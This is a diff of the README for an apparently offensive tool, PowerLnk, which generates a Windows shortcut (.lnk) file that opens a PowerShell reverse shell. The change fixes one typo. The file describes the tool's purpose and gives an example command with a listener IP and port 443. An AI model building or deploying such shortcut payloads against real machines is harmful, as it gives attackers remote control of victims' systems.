john-xor/PowerLnk/README.md

 generates a .Lnk file that executes a reverse shell in powershell

 # Useage
-script take two parameters -ip and -port where ip and port is the device you are listening on
+script takes two parameters -ip and -port where ip and port is the device you are listening on

 ./PowerLnk.ps1 -ip '192.168.1.5' -port 443